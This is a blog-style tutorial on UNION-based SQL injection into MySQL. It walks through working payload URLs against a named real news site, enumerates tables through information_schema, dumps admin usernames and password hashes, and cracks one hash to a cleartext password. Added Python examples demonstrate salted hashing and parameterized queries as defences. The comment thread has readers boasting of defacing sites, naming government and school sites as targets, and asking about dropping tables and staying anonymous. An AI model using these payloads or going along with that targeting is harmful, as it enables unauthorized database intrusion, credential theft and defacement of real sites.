What is SQL injection ?
SQL stands for Structured Query Language. It is a very high-level language, meaning it reads close to plain English: SELECT, INSERT, DELETE and UPDATE statements are used to read, add, delete and update data respectively. SQL is used to design databases and to work with the information stored in them.
SQL injection is a vulnerability in the database layer of an application that lets an attacker run SQL of their own choosing, and so read (and often change) the contents stored in the database. It occurs when user input is put into a query without being filtered, or with improper filtering. Take a site whose page links have the format
www.anything.com/something.php?something=something, for example
www.tartanarmy.com/news/news.php?id=130.
Here 130 is passed into a database query and the page returns the matching result. Let us attach a single quote (') at the end, that is
www.tartanarmy.com/news/news.php?id=130'
and we get an error on screen, because the single quote was included in the SQL statement and broke its syntax. This tells us that our input is not filtered and the page is vulnerable to attack. (A page can be vulnerable without displaying an error; a visible database error is simply the easiest sign to spot.)

Some basics-:
Every database server holds databases; every database holds tables; tables have columns; and the data is stored in rows under those columns.

We have chosen the database "explore_hacking" from the six databases on the server. It has four tables: admin, articles, products, subscribers. Each table has its own columns and the data stored in them. For example, the 'admin' table has the columns id, username, password, email.

 What is information_schema ?
It is a read-only information database present by default in every MySQL server from version 5.0 onwards. It contains metadata such as the names of all databases, tables and columns on the server, which is what makes the attack below so convenient.

We have opened the database "information_schema", which is present by default, and the table named "TABLES" inside it.

SQL Injection Tutorial :- 
 This tutorial is only for educational purposes. Kindly do not misuse it.
Log on to http://www.tartanarmy.com/news/news.php?id=130. We are going to send queries through the URL and read the results back from the screen. The goal is to get the name of the table, then the names of the columns in which usernames and passwords are stored, and finally to fetch them.

Step1.Find number of columns.
We use the "ORDER BY" clause here. ORDER BY n sorts the result by its nth column, so it only works when the query selects at least n columns; ORDER BY 10 on a six-column query is an error. Pick a number, say 10 (assuming the query cannot have more than 10 columns). "--" starts a comment, so everything after it is ignored; MySQL requires whitespace (or the end of the statement) after the two dashes, which is why you often see "--+" in URLs, the "+" becoming a space.
Now go to this URL
http://www.tartanarmy.com/news/news.php?id=130 order by 10--
We asked it to sort the result by the 10th column, and it returned an error: there are fewer than 10 columns. Let us replace it with 9.

http://www.tartanarmy.com/news/news.php?id=130 order by 9--
Again we get an error, so there are fewer than 9 columns. We keep counting down until there is no error.
Finally we reach 6:
http://www.tartanarmy.com/news/news.php?id=130 order by 6--
No error this time, so the query selects exactly 6 columns.

Step 2.Find vulnerable columns.
Now we use "UNION" with a second "SELECT", which must have the same number of columns as the original query (that is why Step 1 matters). Remember to put a dash (-) before 130: no article has id -130, so the original query returns no rows and the page renders only the row our SELECT supplies.
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,2,3,4,5,6--
We get a couple of numbers on screen (the bold ones in the screenshot). Those are the columns the page actually prints, and they are the ones through which we can read data out.
In this case the usable column is number 2.


Step 3. Find database version.
Replace the usable column with "@@version" (or "version()" if the first one doesn't work).
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,@@version,3,4,5,6--
The version string appears on screen. The only thing to note is that it is 5 point something, that
is, at least 5. For a MySQL server older than 5 we would need a different approach, because there is no default database like "information_schema" that stores the table and column names of the other databases; on those versions the table and column names have to be guessed.

Step 4. Finding table names.
Replace the usable column with "table_name" and read from information_schema.tables. database() returns the name of the database the page is currently using, so the WHERE clause restricts the list to that database.
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,table_name,3,4,5,6 from information_schema.tables where table_schema=database()--
We get the first table name on the screen (the page prints only one row).

To get all tables in one go, use group_concat, which joins every row of the result into a single comma-separated string:
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()--
Note that group_concat output is cut off at group_concat_max_len (1024 characters by default), so on a large database use the plain table_name query with limit/offset to page through the rest.

Step 5.Finding column names.
Similarly, get all the columns by replacing 'tables' with 'columns' and 'table_name' with 'column_name':
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()--
This lists the columns of every table in the database in one string. A repeated element, in this case 'id', marks where one table's columns end and the next table's begin, so we can work out which table has which columns. To list the columns of a single table, add and table_name='tar_admin' to the WHERE clause (the name can also be written as a hex string, 0x7461725f61646d696e, if quotes are filtered).

Step 6.Fetching data from columns.
We can now fetch the data stored in any column, but the interesting ones are username and password.
These columns are in the first table, tar_admin. "0x3a" is the hex code of a colon; MySQL treats it as the string ':', so it separates username from password in the result (a quoted ':' would also work, but the hex form survives quote filtering).

http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(username,0x3a,password),3,4,5,6 from tar_admin--

So finally we get the usernames and passwords on screen, but the passwords are hashed rather than stored in clear text.
Such hashes are often crackable. Let us choose a username, say
"Sneds". Its password hash is 7d372d3f4ad3116c9e455b20e946dd15; at 32 hex characters it looks like an unsalted MD5. Log on to http://md5crack.com/crackmd5.php and paste the hash there.
It cracks it for us: we get 'oorwullie' in the result (the password in clear text).


Note: a hash is not encryption. It is a one-way function with no key and no way to reverse it; crackers simply hash millions of guesses and look for a match, which is why an unsalted MD5 of a weak password falls instantly. There are countless online crackers available; keep trying. Strong passwords, or passwords stored with a salted, slow hash, may not be crackable at all.
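Why the online cracker works, and what a defender does about it, as an added example that is not part of the original post. The wordlist and the "leaked" hashes are constructed for the demo (md5("password") and md5("123456") are well-known values; the third hash is deliberately absent from the wordlist), and the PBKDF2 parameters are assumptions.

```python
import hashlib
import hmac
import os

# Constructed sample data for the demo.
WORDLIST = ["123456", "letmein", "oorwullie", "password", "qwerty"]
LEAKED = {
    "alice": "5f4dcc3b5aa765d61d8327deb882cf99",   # md5("password")
    "bob":   "e10adc3949ba59abbe56e057f20f883e",   # md5("123456")
    "carol": "0123456789abcdef0123456789abcdef",   # not in the wordlist
}


def md5_lookup_table(wordlist=WORDLIST):
    """The precomputed table an online cracker relies on: MD5 has no salt and
    no key, so one hash per guess serves every site and every user."""
    return {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}


def crack_md5_hashes(hashes, table=None):
    """Return {user: cleartext} for every leaked hash found in the table."""
    table = table or md5_lookup_table()
    return {user: table[h] for user, h in hashes.items() if h in table}


def store_password(password, iterations=200_000):
    """Defender side: a random per-user salt and a slow key derivation. The same
    password yields a different stored value every time, so no precomputed
    table applies, and each guess costs the attacker 200,000 iterations."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    _, iterations, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print(crack_md5_hashes(LEAKED))     # {'alice': 'password', 'bob': '123456'}
    stored = store_password("password")
    print(verify_password("password", stored), verify_password("Password", stored))
```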
Where is the login panel or login page of website ?
So you have the key; where is the lock? Most websites keep their login page at a default location.
For any website, say www.xyz.com, the login page would be at
www.xyz.com/admin , www.xyz.com/administrator , www.xyz.com/adminlogin etc.
The admin page finder linked from this post simply tries all of these default pages for you.



So now you know how dangerous it is to let users send input to the database without any validation. Never be lazy when programming: validate input and, more importantly, use parameterized (prepared) queries so that user input can never become part of the SQL statement. Escaping quotes alone would not even have helped here, because the id parameter is a number and is never quoted in the query.
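The fix the paragraph above calls for, as an added example that is not code from the original post. The three-column news table and its rows are constructed for the demo. It shows the numeric case from this tutorial (where quote-escaping is useless because nothing is quoted) next to the classic quoted-string case, each in its vulnerable and its parameterized form.

```python
import sqlite3


def make_db():
    """Constructed sample table for the demo (assumed schema and rows)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE news(id INTEGER, title TEXT, author TEXT);
        INSERT INTO news VALUES (130, 'Match report', 'editor');
        INSERT INTO news VALUES (131, 'Draft, not public', 'admin');
    """)
    return con


NUMERIC_PAYLOAD = "-130 UNION ALL SELECT 1,2,3--"   # the technique from this tutorial
STRING_PAYLOAD = "nobody' OR '1'='1"                # breaking out of a quoted literal


def by_id_vulnerable(con, id_param):
    # Unquoted number pasted into the SQL. Escaping quotes would not help:
    # there is no quote to escape out of, the input is already SQL.
    sql = "SELECT id, title, author FROM news WHERE id = " + id_param
    return con.execute(sql).fetchall()


def by_id_fixed(con, id_param):
    # 1. Type check: ?id= must be an integer, anything else is rejected outright.
    try:
        news_id = int(id_param)
    except ValueError:
        return []
    # 2. Bound parameter: the value travels separately from the statement text,
    #    so it can never change the structure of the query.
    sql = "SELECT id, title, author FROM news WHERE id = ?"
    return con.execute(sql, (news_id,)).fetchall()


def by_author_vulnerable(con, author):
    # Quoted string built by concatenation: a single quote in the input ends
    # the literal and the remainder is executed as SQL.
    sql = "SELECT id, title, author FROM news WHERE author = '" + author + "'"
    return con.execute(sql).fetchall()


def by_author_fixed(con, author):
    # Same query with a bound parameter: the quote is just a character in the value.
    sql = "SELECT id, title, author FROM news WHERE author = ?"
    return con.execute(sql, (author,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(by_id_vulnerable(db, NUMERIC_PAYLOAD))     # [(1, 2, 3)]  attacker's row
    print(by_id_fixed(db, NUMERIC_PAYLOAD))          # []           rejected
    print(by_author_vulnerable(db, STRING_PAYLOAD))  # both rows, including the draft
    print(by_author_fixed(db, STRING_PAYLOAD))       # []           no such author
```

The same two rules carry over to PHP/MySQL unchanged: cast or validate the type, then use mysqli or PDO prepared statements with bound parameters instead of string concatenation.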

Kindly mention your queries in the comments. Everything we did by hand can be done easily with automated tools; I will cover that in the next post. But avoid the tools if you really want to learn.

78 comments:

  1. nice one

  2. Thanks for sharing this, it's a good tutorial but I already knew it;
    with it I have defaced almost 30 sites.
    Thanks.

  3. this doesn't work with admin at last

  4. This doesn't work on the last one, with only .php and not .php?id=.
    If it is possible with plain .php, please let me know.

  5. There must be something like ?anything= through which we can send our input. Search for this type of link on the website.
    Thanks Salman, Myk. Stay tuned.

  6. Amazing dude .......

  7. thanks very good post
    keep it up

  8. Thanks shabz and unethical bloggers. Stay connected and keep learning :)

  9. none of the links opened..

    doesn't work

  10. Sorry friend, the vulnerable website is under construction now. Obviously it was working when I wrote this article. Don't worry, I will write one more like this.

  11. But how do I get all the column names for a particular table name?
    Also the page has a limit on the number of columns it shows, so how do I get the column names beyond the limit?
    Please tell me about that.

  12. The page has a limit on how many column names it shows, so how do I get all the column names, and also
    how do I get the column names for a particular table name?

  13. what about aspx?? does it work there??

  14. SQL injection works everywhere, in php, asp, aspx or jsp, if the user's input is not properly filtered. But the syntax for exploiting the vulnerability is different. This tutorial is only for php/mysql injection.

    Sorry himanshu, I wonder how I forgot to reply to your query.

  15. Some tables show an error when inserting the last query, while other tables work fine. What might be the problem?

  16. Very interesting post. The special thing about your post is the clear explanation with screenshots. Keep it up friend.

  17. @ahujaavi13

    You might face this problem rarely. It might be because of the user privileges.

    @Hacking Facebook
    Thanks a ton.

  18. where is the download link

  19. can you try to deface this website http://up.phinma.edu.ph/

  20. please help me :( I want to deface the website of our school...

  21. please help me... order by doesn't work...

  22. it's awesome....

  23. Nice sharing guys,
    please share with me more sites with more examples.

  24. I'm totally new to hacking, but with your articles I can get a better idea of how this works. Not only this article, I mean every article is very clear. So keep it up.
    All the best for writing more and more articles in future too.

  25. Thanks friends

  26. nice post, keep it up, we need more stuff here

  27. nice one

  28. excellent, I like it, but some websites have .html as the extension without php? what can I do, I don't know exactly, please help me

  29. ahhh, md5crack can no longer crack the password

  30. well explained article

  31. @aneesh :
    well explained bro !! :)
    @everyone :
    If you try to log in to any Indian website you may land in some legal issues, so I request everyone to use Pakistani websites for all your experiments !!!

    try these
    pkmotors.com
    presidentofpakisthan.gov.pk
    and so on .... !!!

  32. lol

  33. Can you please provide me a tutorial on pkmotors.com? I am able to get the details of the tables, but the later steps are failing, so please send a tutorial to my email: akulapvnkmr@gmail.com

  34. thanks for sharing,wonderful tutorial...!!!

  35. http://www.justdresses.co.uk check this one!

  36. yes, it's working and I have hacked some websites too.

  37. good tutorial...
    I want to create my hackers team, and I'm looking for some people who are interested in it... if you want to do it with me, send me an email, rolllings4@yahoo.fr

  38. Nice tutorial. It helped me do it manually on some site instead of using Havij. Now I am curious how to use drop table, insert and stuff like that with this tutorial. Can you explain that?

  39. How can you use insert and delete or drop table in this tutorial?

  40. can you give another vulnerable site that works with this tutorial? thanks so much, I need it so badly...

  41. can you give me some vulnerable site that works with this tutorial..? thanks so much, I really madly need it

  42. I'm stuck after finding the sql version....... it's >5 and I don't understand what to do now.... please help !!!

  43. I'm stuck after finding the sql version... it's > 5 and now I don't understand what to do.... please help !!!

  44. Nice tut, after reading it I can do it with my eyes closed, but I'm struggling to update databases. I know I'm doing something wrong here, please help with this statement. I think I'm trying to do an update in the middle of the website's select statement and I also don't think that the union should be there:
    http://www.site.co/index.php?cat=-50 union select all group_concat(cat_id,cat_name),2 from category ; update category set cat_name = 'test' where cat_id=1--

  45. I can reach the column stage but I just can't fetch the data from the columns /:, it's set up like this: site.net/main.php?id=-2 union all select 1,password,3,4 from owners-- but I keep getting this error "Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/mobil0/public_html/cwm/neff/main.php on line 45" any tips?

  46. what exactly can you do then, and how hard is it to do?

  47. http://www.domexinfo.in/news.php?id=66' It shows a mysql warning but doesn't reveal any table or column info. @Aneesh M. Makker what's wrong with it?

    And for some websites "'" is not applicable: http://www.eastbengaltherealpower.com/east-bengal-football-club-cherished-moments/id/130'

    http://bdnews7.com/bangladeshnews/?p=361'

  48. I'm building a website in jsp [sql injection]; on the login page I've used two fields, loginuser and password, where only a valid user can log on, but now the problem is that I am not able to log on when I type '' instead of a valid user in the loginuser field and 'or'= in the password. please help
    my email is: amitjoshi940@gmail.com

  49. I would like to know the way of defacing it; as it is, you can just access the tables :(

  50. hey bro admin, I'm a fan of hacking and you are a real hacker dude.............

  51. What if we want to see columns of specific tables?

  52. what to do when the server version is less than 5 but more than 4

  53. -52 union select all 1,group_concat(user_name,0x3a,password),3,4,5,6+from+user--

    it gives the vulnerable column 3 instead of username and password..
    what is the problem?

  54. what the fuck, you're the real hacker dude,,,, are your tools made in vb.net?? or what??

  55. When I use the command: union select all 1,2,3,4..., "Access Denied" appears, what should I do?

  56. Before trying to hack any website, what are the must-know security or privacy issues (or whatever they may be) I should consider to hide my identity or hack anonymously?

  57. heyy

  58. thanks ya

    but at the end, when we find the pass and user, you use .....1,group_concat(username,0x3a,password),3,4,5,6 from tar_admin--

    but that doesn't work every time, so now use

    .....1,group_concat(username,0x3a,password),3,4,5,6 from login/* +from+information_schema.columns+where+table_schema=database()--

    check it!!!!!!!!!

  59. it's not working!

  60. is this only for .php sites ?????????

  61. where can I get the tools you are using?

  62. your method is right up to the version name... but I'm not able to get the table name from this... http://www.olomouc.com/ubytovani/hotel.php?id=12 it is showing a mysql error... can you tell me.. what might be the problem...????

  63. Hello all, I am new to this forum and I would like to ask what the benefits of sql training are, what topics should be covered, and it is kinda bothering me ... and has anyone studied this course wiziq.com/course/125-comprehensive-introduction-to-sql of SQL tutorial online?? or give me any other guidance...
    would really appreciate help... and also I would like to thank you for all the information you are providing on sql.

  64. I am not a programmer but I have this SQL subject this session and have to prepare for it. What topics should be covered in it?
    And has anyone studied this course www.wiziq.com/course/125-comprehensive-introduction-to-sql of SQL tutorial online?? or give me any other guidance...
    would really appreciate help

  65. how about this IP 200.11.212.107

  66. Try to hack www.coverxs.com if you can!!!

  67. what if, on the website, "something = something" can't be found!!

  68. beautiful! I did a self tut and was able to follow your instructions... am on my way to my first ever deface... hahaha

  69. If the id is not there in the url, then how do we do it?

  70. As part of an assignment I am doing sql injection in jsp;
    now when I write that "order by" query to select where, I am getting an error,
    it is not responding at all.

    here is my code of jsp file
    <%@ page import="java.sql.*" %>
    <%
    // Assumed for completeness: the account id comes from the "search_box" request
    // parameter (as in the URL below) and dbUrl is a local MySQL connection string.
    String account_id = request.getParameter("search_box");
    String dbUrl = "jdbc:mysql://localhost:3306/assignment";
    javax.servlet.jsp.JspWriter out1 = out;
    Connection con = null;
    Statement stmt = null;
    ResultSet rs = null;
    try
    {
    Class.forName("com.mysql.jdbc.Driver");
    con = DriverManager.getConnection(dbUrl, "root", "toor");
    stmt = con.createStatement();
    // The parameter is concatenated into the SQL inside single quotes, so the
    // query is injectable only through input that closes that quote first.
    String query = "select username,salary,account_no from data where account_no='" + account_id + "' ";
    rs = stmt.executeQuery(query);
    while ( rs.next() )
    {
    out1.println("your account information");
    out1.println(rs.getString(1));
    out1.println(rs.getString(2));
    out1.println(rs.getString(3));
    }
    }
    catch (Exception e)
    {
    out1.println(e.getMessage());
    }
    finally
    {
    if (con != null) con.close();
    }
    %>

    I can successfully replace the account id with 'or'1, it works, and I filtered that also,
    but when I try
    "http://localhost:8080/WebApplication6/display.jsp?search_box=10001%20order%20by%201--" it does not do anything. what change do I make in my code so that I can do sql injection in jsp?

  71. Hi,
    Actually on one website, they are executing 2 different sql statements by passing the given textbox input.
    These 2 different sql statements return different sets of columns.
    How will you exploit or use the "UNION ALL" statement in this scenario?????? please help..??

  72. Can we hack the fb database with this technique??

  73. Can we hack the fb database with this technique???

  74. sql injection

  75. I found a website that is vulnerable, but on union select it says access denied for ...

  76. Instead of (admin) I am seeing (id), please, what should I do?

  77. wtf, this isn't working for the given website!

  78. admin, please mail me the names of some vulnerable sites.................... I want to use them in my sql injection project............
    mail me on : silwon2012@gmail.com
